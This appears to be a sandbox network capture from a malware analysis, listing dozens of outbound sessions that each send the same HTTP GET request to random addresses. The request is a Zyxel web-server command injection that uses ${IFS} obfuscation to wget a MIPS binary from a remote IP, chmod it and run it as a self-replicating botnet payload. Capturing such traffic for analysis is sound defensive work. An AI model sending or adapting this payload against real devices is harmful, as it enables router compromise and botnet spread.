                                                Jan 12, 2024 18:16:38.825052023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8468192.168.2.235395473.215.122.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825087070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8469192.168.2.2350986194.120.216.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825146914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8470192.168.2.2340090199.22.193.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825185061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8471192.168.2.2342316190.252.112.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825217009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8472192.168.2.234135897.59.80.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825280905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8473192.168.2.2338880117.193.121.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825340033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8474192.168.2.2345606197.161.238.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825373888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8475192.168.2.234763874.157.201.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825449944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8476192.168.2.2352192198.185.123.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825489044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8477192.168.2.235398661.147.234.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825547934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8478192.168.2.2355560223.251.223.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825603008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8479192.168.2.235014032.206.65.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825654984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8480192.168.2.2334616202.189.220.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825689077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8481192.168.2.233953834.239.207.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825767994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8482192.168.2.235399874.156.243.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825825930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8483192.168.2.233403678.82.43.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825872898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8484192.168.2.2340326154.22.199.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825931072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8485192.168.2.2345058120.243.193.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825953007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8486192.168.2.2356914144.13.180.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.830703020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8487192.168.2.2360558149.67.61.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.830769062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8488192.168.2.234925643.2.223.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832422972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8489192.168.2.233295692.62.147.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832463026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8490192.168.2.235924084.49.176.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832509995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8491192.168.2.2357892145.72.149.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832530975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8492192.168.2.2335784136.146.212.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832690954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8493192.168.2.233842298.79.76.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832719088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8494192.168.2.235141678.118.74.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832746029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8495192.168.2.2350744129.138.132.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832778931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8496192.168.2.2333052185.184.86.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832840919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8497192.168.2.2348494195.224.250.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832847118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8498192.168.2.234254214.156.41.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832894087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8499192.168.2.2335376100.213.109.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832925081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8500192.168.2.234882270.181.244.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.832979918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8501192.168.2.236010623.196.148.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833012104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8502192.168.2.235706268.87.19.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833045006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8503192.168.2.2339038120.156.78.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833103895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8504192.168.2.235219887.18.70.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833122969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8505192.168.2.2333114144.6.7.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833152056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8506192.168.2.2346718170.124.186.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833226919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8507192.168.2.235412623.39.199.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833250046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8508192.168.2.2347044207.74.102.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833281994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8509192.168.2.2344614160.182.6.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833311081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8510192.168.2.2337726156.238.133.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833357096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8511192.168.2.234264246.190.98.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833389997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8512192.168.2.2356126116.16.3.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833408117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8513192.168.2.233893898.206.8.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833446026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8514192.168.2.2335982103.100.28.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833497047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8515192.168.2.2339204107.226.210.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833543062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8516192.168.2.2344122191.209.3.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833566904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8517192.168.2.2350108159.44.134.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833633900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8518192.168.2.2341598137.208.153.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833661079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8519192.168.2.236075413.136.149.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833707094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8520192.168.2.2339720109.95.96.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833765030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8521192.168.2.2335098102.32.170.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833791018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8522192.168.2.2346174177.132.111.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833842993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8523192.168.2.2347296201.62.170.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833867073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8524192.168.2.234748664.32.41.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833920002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8525192.168.2.234345437.104.195.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833971024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8526192.168.2.2356302129.1.196.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.833997011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8527192.168.2.2338250130.94.67.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834052086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8528192.168.2.235249668.134.60.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834079027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8529192.168.2.2333100167.163.38.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.834114075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8530192.168.2.233579692.119.114.232443
                                                TimestampBytes transferredDirectionData
